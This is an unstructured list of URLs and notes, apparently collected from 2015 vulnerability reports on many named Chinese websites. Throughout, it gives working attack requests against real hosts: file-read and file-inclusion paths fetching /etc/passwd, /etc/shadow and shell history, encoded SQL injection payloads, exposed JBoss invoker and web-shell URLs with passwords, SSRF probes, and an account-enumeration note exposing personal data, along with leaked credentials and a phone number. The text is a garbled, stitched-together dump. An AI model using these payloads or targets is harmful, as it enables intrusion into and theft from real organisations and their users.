http://www.oldssdpp.fudan.edu.cn/sabout.asp?lx=small&xclassid=1&id=11 http://st.octmami.com/wap/user/login 
http://27.115.100.242/wap/user/login http://st.octmami.com/wap/user/login http://manage.st.octmami.com/wap/user/login http://svn.octmami.com/wap/user/login http://test2.st.octmami.com/wap/user/login http://test.st.octmami.com/wap/user/login http://t.st.octmami.com/wap/user/login http://dev.st.octmami.com/wap/user/login http://1.st.octmami.com/wap/user/login http://3.st.octmami.com/wap/user/login http://s2.st.octmami.com/wap/user/login http://st.octmami.com/wap/user/login http://**.**.**.**/support.php?id=102 http://**.**.**.**/support.php?id=102 http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action http://www.huozhan.com/ArticlesAction_query.do?cateID=69 site:http://**.**.**.**/login!login.action http://mall.tekism.cn/ http://www.huozhan.com:80/HelpAction_showNewsDeatil.do?areaCode=010BJ&newsId=8065 http://mail.sinochemsdfy.com/ http://**.**.**.**:801/OutPortal/OutPortalDetailView?messageid=86 http://**.**.**.**/Page/dypt.aspx?t_id=9 a.asp/3.jpg http://**.**.**.**:8080/admin-console/ http://**.**.**.**:8080//invoker/JMXInvokerServlet http://tzds.zhcw.com/home/plug.php?do=service http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay daemon:xampp http://home.stocang.com/ www.stoscm.com https://github.com/hivencent/TestCase/blob/4edf196eaa2f9af745fec9b1c989d188f2049f90/wishchen/register100.py URL:http://203.171.237.78/login.jsp http://**.**.**.**/youyue/index-common?aid=8212&page=2 www.wanda.cn/www.wandafilm.com/www.baidu.com http://app.wanda.cn/KidsReport/OA/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88 http://project.kuxun.cn:8080/seeyon/index.jsp http://mail.faw.com.cn/ https://mail.midea.com http://**.**.**.**/main/model/newinfo/newinfo.do?infoId=10730 http://www.kkeye.com/jtest_test/Default.aspx http://**.**.**.**/点击标识链接 http://meet.htsc.com.cn/ http://meet.htsc.com.cn/solr/#/ http://1.85.40.239:8080/invoker/JMXInvokerServlet 
http://nfc.newchinalife.com/pxptpingshidayi/Register.aspx?oid=1000 http://nfc.newchinalife.com http://**.**.**.**/lzzx/zwdt/201503/t20150325_79612.htm http://**.**.**.**/detail.php?id=13597 http://**.**.**.**/detail.php?id=13597 http://pl.fh21.com.cn/subindex.php?catable=hospitalcat&catid=1&catname1=&catname2=&num=736&page=4&table=hospital http://huodong.fans.tcl.com/login.php这个登录位置是有验证码的 http://wooyun.org/bugs/wooyun-2015-0148934 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001'and Tips:System http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001'and'a'like'a http://www.17chang.com/.git/config https://**.**.**.**/register.html http://www.17chang.com/.git/config http://www.ddky.com/address/addConsignee.htm http://xss.gift/ddkycsrf.html http://**.**.**.**/front/bin/ptlist.phtml?Category=8087 http://**.**.**.**/front/bin/ptlist.phtml?Category=8087 http://139.219.1.83/ http://vmart.infoclouds.net/index.php?g=Home&m=Index&a=login http://**.**.**.**/acrms/jsp/Login.xhtml http://**.**.**.**/acrms/jsp/Login.xhtml http://**.**.**.**/adrareams/jsp/Login.xhtml http://reg.easou.com/ http://reg.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://reg.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://reg.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://**.**.**.**/helpsdangyecont.php?id=41 https://github.com/solo123 https://github.com/xpwiq168/luoha/blob/b457972b029b7ee0354fd5881bcfc4eee91424dc/logserver-app/src/main/resources/email.properties http://**.**.**.**/ http://**.**.**.**/vfs/tmp/upload/test.txt http://ftp.17chang.com http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830 http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830 https://www.tzbao.com/logon.html pass:123456 http://**.**.**.**/exoa/root.jsp 
http://test.pwel.com.cn http://**.**.**.**/ http://123.127.246.3:8001/lms/app/login/login.jsp http://123.127.246.3:81/存在目录遍历 http://xy.zhcw.com/front/searchCourseResult?page.currentPage=1&searchRequest=-1 http://xy.zhcw.com/front/searchCourseResult?page.currentPage=1&searchRequest=e http://**.**.**.**/show.asp?id=-1 http://**.**.**.**/成都理工 http://**.**.**.**/ http://**.**.**.**:8888/安阳工学院 http://**.**.**.**/ http://web.**.**.**.**:8080/car_getInfo.do?ram=0.3880515185000556&cid=872755 http://crm.17chang.com/ http://**.**.**.**/bugs/wooyun-2010-061930 http://**.**.**.**/nxdsy/ http://**.**.**.**/nxdsy/upfiles/news/test.asp http://**.**.**.**/i/main/login.jsp http://kaihu.yhqh.com.cn http://**.**.**.**/ http://wap.fcsc.com/wap.tar.gz http://app.zhcw.com http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig http://**.**.**.**/newsinfo.aspx?id=240&nid=6 http://**.**.**.**/newsinfo.aspx?id=240&nid=6 https://www.xinxindai.com/user/iforgetpassword.html https://github.com/xvwenlin/aipugame https://github.com/xvwenlin/aipugame/blob/5d5bbaa49945b2581aaf02d8808930a648c5f6b4/aipu_dc/environments/prod/common/config/main-local.php mysql:host=10.66.130.240;dbname=aipu_dc http://**.**.**.**/include/bak/upload.jsp http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s http://www.domyshop.com/ http://www.domyshop.com/user/foget.html http://www.ddsy.com http://area.ddky.com/order/view.htm http://area.ddky.com/desktop/view.htm https://pay.xiangshang360.com/xweb/bidding/list?period=180-1000&interest=13.0-1000.0&orderByCondition=&pageNum=1&_=1446837749753 http://passport.mgyun.com/UserCenter/Info# 
http://api.51yche.com/Activity/event/event_id/4 http://www.abc360.com/log.txt http://oa.tjjt.co/ http://www.openfind.com/taiwan/about.php http://host1.openfind.com.tw/.svn/entries http://blog.openfind.com.tw/.svn/entries http://**.**.**.**:9001/cas/login?service=http%3A%2F%2F**.**.**.**%3A9004%2F http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/install/index.jsp http://**.**.**.**/cK/ws.jsp,密码112120 http://**.**.**.**/wheretobuy/autocomplete http://121.14.3.150:8081/---黑名单管理系统 http://121.14.3.150:8081/blacklist.sql http://122.115.42.242/audit/index http://122.115.42.242/user/view?id=530 http://www.ziroom.com/ http://cms.ziroom.com/ http://www.ziroomapartment.com/ http://119.254.70.101:8000/homelinkcb/ http://huodong.homelink.com.cn/xinfang/.svn/entries https://mail.homelink.com.cn https://vpn.homelink.com.cn http://www.iapppay.com/phpmyadmin/#PMAURL-0:index.php?db=&table=&server=1&target=&token=442e73ffd35aa0247c0c28300195c3cb http://sys.iapppay.com/phpmyadmin/#PMAURL-3:sql.php?db=phpmyadmin&table=pma__userconfig&server=1&target=&token=7213a819c6efb2cce3280faeb7d05363 http://new.iapppay.com/phpmyadmin/#PMAURL-6:index.php?db=&table=&server=1&target=&token=dfbe679cd8ec7bb8bc6f2496dd31061a http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://www.homelinkhr.com/one8.jsp http://www.homelinkhr.com/cmd.jsp jdbc:mysql://127.0.0.1/homelink?useUnicode=true&characterEncoding=utf8 http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80 http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302 http://homelinktc.sinaapp.com/admin.php?type=modify&id=3 http://www.chinawutong.com/goq/getcommpinyin.ashx?ComName=1 www.chinawutong.com/ashx/clickcheline.ashx?CheLineID=1963370%20AND%203*2*1%3d6%20AND%20890%3d890&cust_id=1279006 
www.chinawutong.com/fbhy.aspx?e=%CC%EC%BD%F2%CC%EC%BD%F2%20%BE%B2%BA%A3&id=522846&line=%f0''%f0%22%22&s=%B9 http://**.**.**.**/Home/Home/Login http://www.open.com.cn/search_studycenternew/1/1.html?\u0027 http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0032\u0030\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u004f\u0062\u006a\u0065\u0063\u0074\u0073\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0078\u0074\u0079\u0070\u0065\u003d\u0027\u0055\u0027\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 
http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0032\u0030\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u004f\u0062\u006a\u0065\u0063\u0074\u0073\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0078\u0074\u0079\u0070\u0065\u003d\u0027\u0055\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u006c\u0069\u006b\u0065\u0027\u0025\u0075\u0073\u0065\u0072\u0025\u0027\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0031\u0030\u0030\u002f\u002a\u002a\u002f\u002a\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u005f\u0043\u006f\u006e\u0066\u0069\u0067\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0031\u003d\u0031\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 https://**.**.**.**/product.php?id=1 
http://**.**.**.**/DP/Sin/News.asp http://t.cn/RUUNjzh http://wooyun.org/bugs/wooyun-2015-0144551 http://www.iurp.ecnu.edu.cn/admin/index.asp www.pagoda.com.cn的同时发现www.bgyshop.com www.bgyshop.com(112.124.12.109)开svn果断尝试 http://www.ztemall.com/%E5%AE%A2%E6%88%B7/%E4%BF%AE%E6%94%B9 http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**//login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**//login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd 
http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://.../images/database/admin.xml http://**.**.**.**/images/database/admin.xml http://**.**.**.**//images/database/admin.xml http://**.**.**.**/djwh/djwh-detel.asp?leibieid=5&pid=171 http://**.**.**.**/FxqStudent/Login.aspx http://202.96.191.150/ http://**.**.**.**/index.php?op=S&SID=39&PType=N http://**.**.**.**/index.php?op=S&SID=39&PType=N http://www.oppodigital.com.cn/showroom.php?act=get_store&sell_district_id=1 http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/interface/ugo.php?OA_USER=username http://**.**.**.**:81/interface/ugo.php?OA_USER=yasq http://**.**.**.**/interface/ugo.php?OA_USER=jxy http://**.**.**.**:8000/interface/ugo.php?OA_USER=chenling http://**.**.**.**/interface/ugo.php?OA_USER=zhangpeng http://www.shizu.co/interface/ugo.php?OA_USER=hukang http://**.**.**.**/interface/ugo.php?OA_USER=wangjing http://**.**.**.**/trip/trip.asp?tno=62 http://**.**.**.**/trip/trip.asp?tno=62 http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO https://github.com/chenyunkuan/xiangshang-engine/blob/005709b07b511ecfba5a63e7638a33095b4f211a/etc/online/log4j.xml http://gps.chinawutong.com:80/ http://**.**.**.**/ http://oa.bjgold.com.cn http://oa.bjgold.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/bugs/wooyun-2015-0142764 http://www.hillhouseacademy.com/,点击标识链接地址 http://182.92.98.150:8080/hillhouse/page!regedit.action存在命令执行漏洞 http://**.**.**.**/about.aspx?id=26 http://show.test.yoho.cn/admin/default/yoho http://**.**.**.**/s/1jGf0oFc http://task.baoxian.in/jira/login.jsp 
http://task.baoxian.in/jira/issues/?jql= http://www.srcc.ecnu.edu.cn/News_search.asp?key=s&otype=title&Submit=%CB%D1%CB%F7 http://**.**.**.**/ http://**.**.**.** http://www.opencom.cn/special/solution.php?id=14 http://**.**.**.**/page.php?no=10 http://**.**.**.**/ShowContext1.php?fm_no=AC01620 http://**.**.**.**/ http://**.**.**.**/certiInfo/index.php?item=cerHomePagexak01xcermni1xcer3348xcer1 http://app.wandahotels.com/hotelprocess/privilege/getPrivilegeList.action http://www.yhqh.com.cn/index.php?m=content&c=index&a=lists&catid=538) http://**.**.**.**/ http://**.**.**.**/Mall/Search?pi=1&type=0&keyword=* http://imcs.ecnu.edu.cn/MAIN/CompVisualizeBig.asp?id=12 http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11 http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11 http://changyan.kuaizhan.com/bbs/board/topics/UNAUDIT/591 http://oa.xinxindai.com/ http://oa.xinxindai.com:80/weaver/weaver.email.FileDownloadLocation?fileid=30* http://oa.xinxindai.com/ http://oa.xinxindai.com/tools/SWFUpload/upload.jsp http://oa.xinxindai.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/new_list.asp?id=788 http://**.**.**.**/include/tpllib/ http://mail.xiangshang360.com/CVS/Root http://mail.xiangshang360.com/CVS/Entries http://rmp.haier.net/ items:6:number items:6:age items:6:evicted items:6:outofmemory items:7:number items:7:age items:7:evicted items:7:outofmemory items:8:number items:8:age items:8:evicted items:8:outofmemory http://**.**.**.**/manage/Checknews.aspx?Newsid=2435 http://202.108.103.169/ http://202.108.103.169/manage/login.action http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43 http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43"-p http://area.ddky.com/order/view.htm http://wxtest.efunds.com.cn:8080//live800/存在live800客服系统。测试了下,任意下载的漏洞依旧存在 http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ReportSubmit/ 
http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0153132 http://**.**.**.**/myinto/my_gift.php http://l.airchina.com.cn http://l.airchina.com.cn/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://www.jahwa.com.cn/admin/login.aspx http://sso.99fund.com/robots.txt/1.php http://sns.99fund.com/robots.txt/1.php http://u.99fund.com/robots.txt/1.php http://sleb.learnnow.net.cn http://**.**.**.**/ https://passport.pptv.com/v3/login/login.do?format=jsonp&from=web_liveinter&cb=jQuery18309729133896209238_1447124954683&username=test&password=test&CheckboxSaveInfo=on&_=1447124971599 http://www.agrite.com.cn http://www.originseed.com.cn/news/view.php?id=894 http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods http://**.**.**.**/ http://moa.zte.com.cn/web.zip http://job.zte.com.cn/ http://mds.zte.com.cn/ postgres:passwd www.12hotpot.cn,crm.12hotpot.cn,eip.12hotpot.cn,然后看看登录口如:http://www.12hotpot.cn/member_modifyi_login.aspx,http://eip.12hotpot.cn/WebERP/DefaultLogin.aspx等。 http://t.cn/RUUNjzh http://**.**.**.**:81/ http://www.59.cn/member/cklogin.asp这个好像就是59互联的主站登录位置,登录的地方有验证码 http://bxapp.homelink.com.cn:1010/kc/login/login1/index.jsp http://218.56.16.62 http://**.**.**.**/login/Admin.aspx http://eln.tsingtao.com.cn http://eln.tsingtao.com.cn:8008/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://eln.tsingtao.com.cn/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://**.**.**.**中国大唐燃料调度中心,注册个账户,选择成为供应商,貌似这样能打到的注册过程中能写入XSS语句的地方随意发挥了 https://ebooking.ctrip.com/ebooking/EbookingLogin.aspx http://yilicmm.yili.com:7001/index.asp https://github.com/wangrui-spiderNet/HnProject/blob/8f28e44933def827c4b0cfb7d9b34e888451d470/WorkLife/src/com/hna/lmail/ui/activities/SplashActivity.java http://**.**.**.**/exoa/default.asp http://shangjia4.chuchujie.com/ http://210.14.138.145:82/ http://tempuri.org/IApi/SysteMtMailInfo http://202.108.103.191:8081/ 
http://202.108.103.191:8080/ http://202.108.103.191:8080//invoker/JMXInvokerServlet http://202.108.103.191:8081//invoker/JMXInvokerServlet http://campus.abic.cn http://123.56.117.57/Public/login http://cn.arsenal.com/player.php?id=4 http://oa.xinxindai.com/login/Login.jsp?logintype=1 http://121.15.6.114:9090/axis2/ http://58.220.10.243:8080/lanrch/index http://58.220.10.231/group1/M00/00/00/rKhhkVZBZIqAaq5TAAAAC8tN8z8483.txt http://**.**.**.**/myinto/order_text.php?doid=485634 http://www.boco.com.cn/boco/cn/news_0.asp?id=4441 http://www.etiandai.com:80/ www.etiandai.com https://www.bao.cn:443/ www.bao.cn http://**.**.**.**:9131/ecippss/存在SSRF漏洞,可探测内网主机开放端口。 http://www.doyouhike.net/s/route/?city_slug=&from=result&keyword=&page=1&route_type_id=10&tag_id= https://www.chujinsuo.com/page/p2p.web.guest/creditTransferList.html?page=4&sort=&desc= http://**.**.**.**/app/multinationaldialog/?a=detail&id=12_182 com:6379 redis_version:2.8.5 redis_git_sha1:00000000 redis_build_id:2593a0dfb605dcec redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.5 process_id:297410 run_id:247c8e85ced0ed1f1adec9158a1d7e7119e0b225 tcp_port:6379 uptime_in_seconds:594316 lru_clock:9633 http://campus.jumei.com http://campus.jumei.com:81 http://campus.jumei.com:9110/x https://campus.jumei.com mysqld:campus.jumei.com:6006 http://app.zhui.cn/usermanage/default.aspx http://219.143.69.58/ http://219.143.69.58/sys/index.php?m=structure&u=centerm&a=draw http://**.**.**.**:8088/register/RegCheckClientId.aspx?ClientId=1 http://**.**.**.**/IPAlarm/login.aspx http://**.**.**.**/PatentNet/Login.aspx http://**.**.**.**/login.aspx http://**.**.**.**/WebPublish/SystemManage/Admin_Main.aspx http://gongyi.homelink.com.cn/lianjia/portal/index http://www.podinns.com/ http://www.agrite.com.cn/.svn/entries http://tjsl.sdu.edu.cn/TestCenter/SubPage/list.php?ClassID=1 http://**.**.**.**:9080/home/index.action?storeId=13464&systemId=MINI%27&recStaff=dldxzqkhb 
http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73 http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73 index.php/welcome/ajax/article/view.html http://kszx.xmu.edu.cn:80/ https://**.**.**.**/domain/**.**.**.** http://**.**.**.**/ http://dts.cgnp.biz/ims4j/user!login.action http://cnoocgas-cz.com http://**.**.**.** http://**.**.**.**/case_class.asp?id=2&Menu=ChildMenu1 http://oa.robam.com/oa/login.asp http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm http://chudan.ehuatai.com/login.jsp http://chudan.ehuatai.com/printPolicy.html?id=78093 http://**.**.**.**/tw/dtbrief/brief.html http://**.**.**.**/tw/b2b/Seminar/shwnws_new.asp?CnlID=18&cat=99&product_id=051981022&id=0000158370_U802M6VE8SZQ7NLWSW0IY http://**.**.**.**/tw/b2b/Seminar/shwnws_new.asp?CnlID=18&cat=99&product_id=051981022&id=0000158370_U802M6VE8SZQ7NLWSW0IY http://**.**.**.**/About_NewsContent.aspx?ReqID=273 http://**.**.**.**/About_NewsContent.aspx?ReqID=273 http://**.**.**.**/ http://noah.21tb.com/os/html/index.init.do http://**.**.**.**/search/search_dacx_result.asp http://**.**.**.** http://erds.chinawutong.com ftp://202.96.191.145 www.anpingdai.com)是深圳市安平盛金融服务有限公司旗下互联网金融平台,专注于互联网金融的创新,通过真实可靠的融资项目、透明公开的信息公示、合规合法的业务流程、完善严格的风控体系为广大投资人提供优质的金融服务。 https://www.anpingdai.com/index.php?s=/User/Index/recover.html http://tools.transn.com/tools/index.php?v=dialog&act=pdetail&pid=27&v= https://github.com/xuhande/webc/blob/0efa9e4a6739c092dfc6b4dbd716cafaafbc1023/App/Common/Conf/config.php http://gys.intime.com.cn/manager/inc/oracle.inc http://gys.intime.com.cn/department/db/oracle.inc https://github.com/Jashion/YAE-sync/blob/516d00068a4a0972a962888904bffa1e903a6101/conf/topo-dev.json http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini 
http://pay.51wan.com/index.php?action=usercheckpage&control=index&game=%E6%88%98%E5%A4%A9%E5%A0%82&module=payment&serverid=16805&time=1447144687765&username=e http://malanlan.chinawutong.com/ashx/WTHandler.ashx?action=getappraise&id=1348093&type=111 http://m.zhcw.com/ucenter/login.jsp,中彩网登陆处。 http://m.zhcw.com/clienth5.do?transactionType=1004&userId=76379&accountName=15852335087&src=0000100001%7C6000003060,此处可以获取账号信息,包含真实姓名、电话号码、身份证号、银行卡号、邮箱、用户名、用户ID等等,通过遍历userID,可以越权获取其它用户信息,这里将第一位从0到999进行简单fuzz,发现共46个段存在用户,即可获得40多万用户信息。 http://api.codoon.com/api/get_good_post http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217 http://m.lvmama.com/activity/index.php?s=L1509/shiyiCityDataInfo&v=0.708363635931164&callback=jQuery17204791056409012526_1447160601872&city=bj&type=bj_zby&_=1447160650217 http://m.zhcw.com/port/get_video.jsp?keywords=1*/&random=0.5842112696263939 http://**.**.**.**/bugs/wooyun-2015-0144624 http://**.**.**.**/TextNewsList.aspx?NTID=11%20%u0062%u0052%u0065%u0058%u003D%u0036%u0033%u0038%u0030%u0020%u0041%u004E%u0044%u0020%u0031%u003D%u0031%u0020%u0055%u004E%u0049%u004F%u004E%u0020%u0041%u004C%u004C%u0020%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0031%u002C%u0032%u002C%u0033%u002C%u0074%u0061%u0062%u006C%u0065%u005F%u006E%u0061%u006D%u0065%u0020%u0046%u0052%u004F%u004D%u0020%u0069%u006E%u0066%u006F%u0072%u006D%u0061%u0074%u0069%u006F%u006E%u005F%u0073%u0063%u0068%u0065%u006D%u0061%u002E%u0074%u0061%u0062%u006C%u0065%u0073%u0020%u0057%u0048%u0045%u0052%u0045%u0020%u0032%u003E%u0031%u002D%u002D%u0020%u002E%u002E%u002F%u002E%u002E%u002F%u002E%u002E%u002F%u0065%u0074%u0063%u002F%u0070%u0061%u0073%u0073%u0077%u0064 http://a.ikangdental.com/log/2015-04-20.txt http://api.110monitor.com/alarm/ListAlarm.jsp?UPYOO_TOKEN=45f23f9e-b989-417f-b658-xxxxxx 
http://img1.allfang.com/upload.do?method=toUpload&formName=frmSend&inputName=file&contentType=knowledge_file&fileType=FILE&nameType=CURRENT&ifZoom=false&upLoadContext=&uploadIpName=file_uploadIp&cityName=newtj&returnIP=localhost:8080/fileupload_2014 http://**.**.**.**/EpointBigFileUpload http://**.**.**.**/EpointBigFileUpload/EpointBigFileUpLoad.rar http://**.**.**.**/EpointBigFileUpload/EpointBigFileUpLoad22.rar http://**.**.**.**/EpointBigFileUpload/FCKFile/EpointFileServer.asmx http://m.zhcw.com/ http://m.zhcw.com/clienth5.do;jsessionid=F0ADB71B059AB59D0F4E87DD22FDD782.h5_224?checkCode=&accountName=手机号&transactionType=300612&tt=0.5841984870484274&src=0000100001|6000003060 http://**.**.**.**/ciecol/web/kcjs_detail.jsp?id=28 http://api.uyan.cc/?url=http://q.com&title=tt&mode=../../../../../etc/rc.d/.././rc.local%00f.html http://m.octmami.com/user/login http://**.**.**.**/index.php?app=goods&id=10970 http://**.**.**.**/index.php?app=goods&id=10970 https://www.xmjr.com/user/messageDetail?messageId=13580 http://**.**.**.**/cmbisc/news/content.aspx?id=2583321 http://**.**.**.**/cmbisc/news/content.aspx?id=2583321 http://**.**.**.**/login.jsp http://**.**.**.**/upfiles/+木马上传之后分配的名字 http://**.**.**.**/upfiles/20151110163331680.jsp密码:pass http://**.**.**.**/login.php http://**.**.**.**/index.php http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**:8787/interIndex.do?method=jubao http://**.**.**.**/report/admin/Login.aspx。 